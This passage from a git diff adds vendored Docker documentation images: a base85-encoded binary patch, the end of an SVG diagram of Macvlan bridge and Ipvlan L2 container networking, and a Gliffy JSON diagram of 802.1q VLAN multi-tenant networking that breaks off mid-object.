z6nkUtzzR)UX1h`NaO7jeGrov$#v-IAnB0bRQIUX2`0{Gwog!&=c7_y;QuU!-7!Ma+P9i0)hk)ZK+qvNG=QPW?#5)*a1&e&L2}m$S6=*ltishAM!VI?EpdD zywb>>t45Z2STvPvvBq^@y>_qPLM>lG$1Q)z=~BH$?j={S3{dmK_k9>;)L%{{TUDPa zE45wz^Ur#>q$P>ggIiADPbU12Kd8c;L%!=RG6bg{4s+Kn^8Q?HEtswg1) zcd|>y>)-E_XP#=c8J%U6Mz3hgppg$K7FNBVL*7C3ZLPGG(L78oB3e=SoW~I)9C!J} z=->~^wYhKN1m7HTUJPfDs5-T|sAGBiV0lU==$dyfsppC(Yt4*mlB{^~$I2bqo?c2h z7Uy^>Ozjw)MUGvGG3>2KX)$l~kH`2CgG>>@pDPPgK_P+&UkAC=s8#6Mer(h0wH!Cr zXIs=*Xl|3i;LCGp)sL?*BhihRWcFsRo2k?jVq|mAS;N|TNUNI_&B=Ymnn&JH;jx-z z4rVsW6wwp8XtM~jh7F0H(XJ<4;N+m^U@ZC-cy04xxXx)x7%#ZTVPZMykUT$O^K1=U z`!h2KO}~dT=oL{PR?OA|zsK65?L!@!%(97#Pg)mX9?Ut9yhG&INaWTnLpqPl9JHc6 zi8_z$=O(}O=?J0(|Mf@*mvz!;a%!6_D>=UuUk}!`TVO^1AI3zVf64vdmz|x=oRnXu z9;%rlRn+Q1u=vrEN-3PU+yUK*(JI03^_FnCF=oz0J%ih_OeWAje;9v(zR1jM``$Ba 
z^JzWMh09%K_V*oG%mQuOdeLX#u-sW9^`r#mcpU;!xQ^1&e4cJZeLghq{aecTN%ZM2 zul|C=+zHK{r@seq7ySZB(zH!28AGO2ovnCCOz;LYBwS~;V8c;x%i0CI* zAIx_N?q-;{IEV-{?MRVi?C?G}Uk?*mh=?@tE?;65a`46D4_8Doa~rRC+Q_+WYG^dy2hDRGv7A*swCIzA1X;dlV0jQk+;#o~)8RkzCo)X2~5 zT9#uaH)daTwGqG_phR;`H%P-NoLRzGtf)bX(n^vzjgcOfm*bN1?o58bbj^z3>%oj4>6w27DAOwo z02PHPSmM5cwh+L3+s1800uZBzH=G>8aRz8_t)s>*Ql841o0)|z?FY^lIyX1f54?!) zSEJ0x?T$+%xe*ljKw>O&8jKsxwqyu`Q8O0@4_=9d+u5X@mOQk)pPc$!aUA`8mYX!) zfOz=0Pe7i``NPIA%L4GKntifOVp6#Ga{b?`&a?aP(PQ{VC=Jft50aYd65m)4CqNYH zFQO5WL}#Y!$2Y6}9Lk`W&49O5W}b+2IEJH(ORn}*XNA?3otDk+EOL&+T*7HBP8kTw z-pKN+-If1XXoE%!lgRl$@Ka4JIr5DokH0Qv$K4*JXSsNCYj>0v*|}_$nkG!{?Wc~{ zK3FA!{bjjS>H%h}{LbUu45)Q~FcN0!6nHgm4Iw#L(FB;$W#-{%?d5cv=Rz6?8jU=fJ2Qjy8M>%cca~=!gFPIR3H1L z_^kb54*k6U;_t?~&xMb3BF{Vy^(UC_Hu+A07ek~*CfaMEeSsqsf%?c{zi*}SM#iYX zuZ>ZStoiJKIJUXr!fGdZyCwhHAaTQ>)Xb!gZ(iZ`7WiuO%OV98e>)4(I^w*-HBT4t znmyx>Mp>FLg03DLCGD4RQf*>-#a6}N@5wOq93=F7qkT2#B7kI>yt>8# zB!@iOF+roqrTO2_M4HX;ay4qd>c+!+N;+#$9|8QI2dF6)F2~T*Q>qQ+6G+Wi5e$0g~XyMHq)YIIKnBwI!+uG~KC!al$ zks=8q28*I7c?28|K?bGtEl0&8EPigeE~7#&S`nNQ0NI>1hYu(TEN7K*g-vpg-lS>I z8Fzw^YL5vOjr0mMOtY8Oeh<%kvWP778^aj(!bsne5r&3^r~X~@7Z?1NVTvI}_q`rP zJs9~!`s?6@pNL_A6Wl%O@06BA6o=rbO~b%EjxmP}hCoqqR-|_ zr>cCM`X2a5baf8vb8~Gz+QCN>E2);k_?SB;s~qb@$rpC%z$rxBnRK(1_y9n#A zCz*VzEuc_Pbo|-eFjz5ZOh{_9V2=KMCPCnapii}m8g-Y^jJ7x}GxVx=?3b1o4E3I< znrH>vhCjpkE(~-a-Iu}K>D8Je3s{jxJwyDN{0Y%Sbtz;XB+MXesZtt|rJAd~C*6Ho z-NxKAMv0X0hy%-#Q}2DgA#u>N7wQZJ(s6j9-wDL+6ONCSH(B4sSRaB$I~?x1wts~) zkGDi;{s#ee3-nW3LK_f-LvX8}d*pL?6#8Gvu5-Z>gI*$sWRITZq+c%QL?tw5aP0X0 z!&BqKR}Q|Obd1fdhZ;duMAoFsV#^N!ekgs-vcabBzi##5iK zL}9GCcTG!`Slc4pn{RVmw`r_p@kTEcU}j&x@??KYs$Je!sot|G#jD!Qfbg0S?KA#k z$9Go1HR*HKnb_xU6BQ|!jRH2zv!;kcbtwYw$ ze$+TSB-*0A3vR_+zu4=qkTM6`5Cgc?Vu4jsKI-$#d0fxCO^MXy@cG1fxjuF4>m z6!S<({3=7jvd@pfmrfbgf@r*_Vwqke#ardA%Vy0VjD~J6DDnd{S1ULdnZ$*wLO+JZ>1-Ix#p1Jr2he#-T!q!N3^$ zUJe2fRJsZJR%AeN9$%uSZZbx`7^72XtZY(SWFi%XQyIEIKN%Qsx)xwbs7wUsL^Q1v zpi=nbP&y8NOudX>ROIJ!0ah(!D0s!ZSeMMS$qlLOCx=LL06gZbb0uRF1WW25G(}^> 
zp5Y2t`;BSP(%bntPe-X95^n^4`m!1}hsigEO&hgmK6 z&`Ro8_ubx4-3;UYhrLOaB`QTAP{ay-2@C1p*-g?;RoR#ByCwE8gs|GS7V_$ODB`DL z+|;!3FLDB2iIJC!Qjoy5fu2D>A&ko&wOPyem{;z}XHV_JB=i>-zEv)FJRZ-R-56uW z545gHmb)K_2oktDAcsALslbZZr-(B!J9t@+PBoSO@>7S13s?L&iWaLF*x!h7q_;4f zJIbR{d$}b|Lc$xpp5+b?w!*wwz0_dZhAt!v+sW`?JeV4MkczII8dJQwj`eE3>2p4O zpn{rLFnDQ6x3#Qj)$+Oo&EqZwOw?2A(0@ zcAhkIXw+!OGU$IZk1gW1{6=SmEzf|TPGB;b|D zF41;e6fMG{rgD#DzG@F!8KK=N(bAOvGdX;FN>2>FH9!az41IQb-um`tM077kN8F(Z zL^MAVhzx$C2D*U`d}xuVE@^?!1A9MKLNRuHM?q`s2*5%xx&SAilY5#F$Nv_@`IKmp zG(aC_f^4l8ULVp&BB3LNU|LKlzHLn*2a-J+0vd2Mg~+ASk#PR$K4I&OHx`1oN#faz z`*$VoB;y;}k0$bu9nuB~mcwGn1P*+M6cfLGr=ea+f=B+E4^1K=nuXV%Mr;cl_Wbiv z&d6YDw(po{zw6X55sMY#@iKd6lEf!Wn`;7kab*PJD0*o^4d8t3s+9=Hum8DTX3AhA z_06{v%|{N9N{FW#${m&MQoIVOvkV(51eXC#0~LM=5@7u^C6|fz2Jj`kAb(dX_#i27 zGEv_#;O3JaQdc>gh$j(vn7?HF`{f&^J)W!y7D6suwU{C8hfj3S(C<4pMw~-}gYQZ^ zURcu65fH=!M|V~;sq2(F2!jgGl?^q5$N z7RC!Nm?U>bV1RRqKu&_$8-rrXrZm|_MKv;~G$XEkc4xNA^ttN|8m?xZu!mjyVxc!} zeEZo2C;h>CP4_3hH>32dNgKl`5N)ha8C6OTv|X=mWKjUgajgaXYZ3~Q6Y2@f^Wgd? 
zo|&AZAJdrhG?%A-m_@j-8L$d?81^xCLAXzhm`b}v9Ruf)+QT|IyzF_=5?y z=N&=@r0yCij?ilEV0y>W(28Vxp_K_!2fGHC84)1GYU7z*pkc+#Wbs({D6E*B^RMaB zexKss0$w^QwC2&O)%_t`WD3vA^Z(eIPFu(1Q6;bEh-g1RPhxnF(2%5k#Q-qljI=o>a_qYk z<+tmM$tR|f`10+gfIs{}jaq$k*|Il21CKzP=t4;Ug1OtfC`aWe2brsB_3TbweLorr ztC)1^ju>mN!AVKCR33|V`0*$Cf#=e&n1;ik&?eY{Iib4IR*48kTaZU(rD;c4C5ZZZ zTZacIC&w&1!I3h+DER3s?c8J>|1zm)LEsn<9N=p+l9EWL{x$GL2vjN&Jtmfpg^_WC zznrtLo9+vK9RiSWAjF}fAOzhsdyo&*1-zlqvjD$l2mL_54}2p43AD%9T0<@W) z#UGCezvUT+2p;$x+Au|{RMutiUZ^LR*TQ|M2YOo;G1)^t(#LWOG0^E#41e8Q+dG>KHf{j z(&ex6wRRV1VDqAchNU>gyAzRq;Ye{F)Gx+?^uT9PZ~EyKpFABJVY?1~m7Y`FONk%Z zl~znQs~}Jk5XpLW=Abgc3Ayk`w#meW`fdtUx|CiqyMjK|F{!8{MlrSG0paNqRKi`_CEB$gv3l})i{pa#+EtuMxyrJoV?qH2gx z#Fd_6mkmxV8s*S_MZZD@s%PIo3qaXatLN-fb_CzRW_PQ}Bfs}J!A$m2zZhxTn)->L zsHp1|;{Iv~hBL$T_+mfdw%Pmi$=!fhu_{5$@dp_LS=MV9vSib zdk0r2#aFq9@9e|%yU2B;v;OK{vtfc6D(Q!X*&}JkT=|)Jx5g^YUpA<_0!==F_YvSC zhZ%NyH3ZW}@8L-_3ecQ+0ChqO>wO{tMrX}@Oc_WrLO{O~2hb@^f>c~K-oqS}7Uk$U z#EWGQ0p)gVzS0KVCqjoLM3#cwVLwe_&*K)I;XSmQjIjz3wE*OOr~?$4bIkI>JZk$b z6je`e(bCX7P|~cg2yDo@F8}K%dYBogh?({;m>I$d&Q?;i>DP!Ubtu}faaLPUh{@lo zO~FNJiQi&XH7p@CJ1F{6jB|fsew*aSCe+XbNO1tqd6+?Hd3f?cS<%`nO>aNJawh-x z6`ORk;Roh>l!i&FrC&=GDPUpi7&OdcwROM+!wFRzu`8Ibv4d}^hZxA;2rt>O640n% zlAQm8q+_d$nbvu=Hj4SWs)51*^Itv9hhE6`%CcgQ>a3(q|G$oD*g9eqNpmV|yLAv2 z*)E1Ec4w>YbYUZM2QIkwIRDLS$}*9b$_IQoNjK6{Bo&DWQ>0Ab)aUQY7r{{mM1LH$Oj%c$f3R z|39dgc~fFAC-6?OORoi4qN*Vxgc4=h zH5DTuM7ktaxzc)R>$M8qXJV?G1a+ zB0sjDRYae&;f{b-tR)B$3{U+^S`a#x424s2LzRp>Y+x*nj3w*qM=mb>`u}X+kJLyx z)QW~mNo)*JUdX@{$MIRqy0^FYUwdh6^eq1jx)NmbM&~ayj>5J79RX;+p5!qn4bQ6y z#r#Ju`&w_MKdygy`?s2L;XOu?mmp50&ezvidk6PGkk_7=KhAoF*CD6tJtsIb_IFm=?WH7%Ma=0B*ym!dx2?0>78N{O28Bpwzl(6Glg@L?$@6e1h{vf2(&> zfLS^tEIwlVOG7tY<8a%n{Z3KZF>@TXv7NlIMbljec{@?&Bo-$^DNWqOxjhpUS^H@@ z4~%>te!18=rad+@AYT96it|I^Ex+efi{^ZPFS7B~RG6aW)Ji7rr?f&oG=fO{n3qPZ zJv3x%eRMgpR*zLYI&>SK<=mr69(iSvYK8s$FUc& z6hi1M83a5IC^#T^TAP^6h=5HP4u0wx%(?|A6cNP(kA&fQ=a>_bZ&ju#hYMJ2MZ+Ta z=kQrrME4>eT(IOvyw(;>pJN)zo|}mYD5da8dZsG9 
zhsxe`z)PX3Dk)wERe&Df1#Dvq>_(Qe9on_(!M%gOwL&UXyt$D<_+0*s zR0pSzf!inHI`x6m`Um5rWqYpFJ`m-s2()EC7#vw-NwO%%S zqfilAIDIR9t^nG%P|jIDc5=#|-76N`S`|er9~;XV5WDkWLq#b@8BEg1x9W!Sqs_5K zX=`iM*e0y_ic(O_&Eee(Dm;qKW)Q?Qixu)48y9AIwbq4^a70RI@f5HpOXRsEZzH~q zP4Qmj`1q(;u?U!6@IUY$zMOj>=02=i{E(8H&GJKWGG?H5adxAHJ(QUrgcta-;lTtM zRR~k6@>)#hIl~zkk}LO8-6Qg_uG^zszJi&r%8?N$HjaCN5lo3!SHyfQ70=+b# zOxL=>nj&y8X|N(~L?;`##Rn^iN-ptZJQS?c!>8lTGs_+X=dT^5P?n}n+2L#a zUs*jURphV4i|TREJ~Ms1k++gtIk9ajG5$^+t|HIsv>u^5gLUT|p9R>y*ryP_WYu`q zsp}F9+Tpr3HKN1g!RJMZ@nudS7n?38t-ZXAV)`Ri>Pt(nY$Y(+1mgc;$+fvjetR+W zMP_IqI=4Lavlg&LAiN2pvudu*{US2{=Bi6HmI46##PG(ApBA{FhNvPuzzr+Ye(5Bp z_L0@k`;Yg{el>`=KIhtMLE;{o1~K56jI1OovZXti9jb(_;x^TuT@~5;G*9l$MryM11#KG35vk zS8d*DH9pjk%@Q=rEmkhnIX!58nvVm>iBqK#W-5xaN}dn!AJJiCf~9axN;nYqhG=gP zc%}Fgm!~%_zRmj|_PVORyi;Ff7R6!haSbw9Q^TIq73@~(Y=O+?2yufyU?8Il$*X^P z%{^)ywABSH4}GUzm5wTcegzBYo^7LUWglP(O6Mz=DG+FkrqjN6t>xZ*H8HJ;Mbd>l z_-q&4!O&wW=v&8d0^`{Q{SDM<+^xkd{x~@yDC{3F@6tvTq#VWJ2$%LmG6ylERpe^D zxisET>(V3OLq)Qq!iv{wX`|bOLs~iEWOo8xGIWz#$AwT~IUmWw z)peI#IXY*+DdppYxvBrhG!re;d5F?{J^%nW60d_0Bh^mdN)&F7JSW31pqcCsH&8!& zhOZ=6#S6o7;VsAF(zRMX(268A_qxfBd|kM;ZXd1^_X{!Y%^Ms>Ih(>S=7in-eAb@# z^ELrCZ{4$hnY!yL34+;iqoXxkT4DUy1vzvxg?Phb`KE$j_QKC`c#~; zKCpMB@o`1e%Vvw^sZTg56izHBnX~4j{|6UAmAOm|U7#y=nIW@Legy1i7_SJatl08a zk$?1K_l5n*Hy%$Gl81IhM}+Drny|$ilDH)itON+p4vlUR_poRp$>~_kyk@FjDPF@j zICF)Ej7P?xD~sn>@;4fB6bq(qKpxFmLu)QHDAIrE2xXqYr8C=Y(n6K|jhZdlEK$8D zOuxtb+)##;ij4SwWJvpQF5c#X6X^EvXwn1#}Ki0-R-0D zC;$_4aqjQqjG$>p&mOzWK`xa1m|+sJSf4K|<(f3PWta)P%=9SbQwF;u2rq7 zAbx+Q{KKP}X*IO99wIEIE0cnMwgpk`cCS)A#t&-5n9^mOSK{^5kEPU+pwUorG+n8i zEDr*KIbiMJ*C4d5hy53%nNhC^W#}H)y#ZVR)M9ai2J8JDlfO1)6Pwa%Na=l>jPR~D zWN{*vLsbbD4dTsfEGmV3M#B#Le1IOYXL(x2!24ah0wi4l$dMH)e}51&`xQ%(_tfh& z=hfPOrYt*i3XBZ6$8E7dd2HSIomjl@)@s~qgc~P_p1m6jVG|?bj=5*%X#IL67V*O9 zVZsCxlu+AjnRg8nO%no#Y7K9lPK%Xmaq_I2LwBS-nZ{XNYIb$~7-}Zi$F3v0Xk&Za z8?p}5XBw;Fe@wwB7%CY=6C~Kzv%|p9#5S{9OQ9irqHWy`h{?pnMC{x_6Dn8lKCU)o 
z2^89UU)i2LnMV3tE_qNa)4O&Gf1c}K`=M)9HK?SCq!?=iR%cUcsuf2ijz`^(uDkDNi?s-lBIv@iG01iz zm7=VyiKc`~djzZ<)D!kSKu&JVd23;0IaEf88fYH$&<6rML5|+!-z4p>1w&UPVQ;|k zs@J0zQ=a9#Mg7q;>{{txEtygSrzContainer #1eth0172.16.1.10/24Container #2eth0172.16.1.11/24DockerHost #1Container #3eth0172.16.1.12/24Container #4eth0172.16.1.13/24DockerHost #2(Host)eth0172.16.1.253/24(IPOptional)(Host)eth0172.16.1.254/24(IPOptional)NetworkGateway172.16.1.1/24ContainersAttachedDirectlytoParentInterface.NoBridgeUsed (Docker0)MacvlanBridgeMode &IpvlanL2Mode \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy new file mode 100644 index 0000000000..40eed17270 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":389,"height":213,"nodeIndex":276,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":5,"y":6.6999969482421875},"max":{"x":389,"y":212.14285409109937}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":64.0,"y":36.0,"rotation":0.0,"id":216,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-12.0,33.0],[84.0,33.0],[84.0,86.0],[120.0,86.0]],"lockSegments"
:{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":190.0,"y":32.0,"rotation":0.0,"id":254,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#f1c232","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-142.0,16.0],[54.0,16.0],[54.0,115.0],[87.0,115.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":133.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":226,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":15.147567221510933,"y":139.96785409109907,"rotation":0.0,"id":115,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":29,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":116,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":17,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":117,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":26,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"start
Constraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887324033,-1.055138662316466],[1.3318647887324033,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":118,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":119,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"i
d":120,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":121,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1 - vlan10

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.0,"y":82.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":4.1999969482421875,"rotation":0.0,"id":187,"width":108.99999999999999,"height":19.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 - 802.1q trunk

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":282.0,"y":8.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":32,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":55.0,"rotation":0.0,"id":210,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-8.0,11.0],[-8.0,34.0],[26.0,34.0],[26.0,57.0]],"lockSegments":{},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":12.805718530101615,"y":11.940280333547719,"rotation":0.0,"id":134,"width":59.31028146989837,"height":83.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":35,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":64.0,"y":73.19999694824219,"rotation":0.0,"id":211,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic
":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.10

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":52.19999694824219,"rotation":0.0,"id":212,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.386363636363733,"y":108.14285409109937,"rotation":0.0,"id":219,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":139.1475672215109,"y":139.96785409109907,"rotation":0.0,"id":227,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":55,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":228,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":43,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":229,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":52,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":232,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":232,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockS
egments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":230,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":231,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":46,"lockAspectRatio":false,"lockS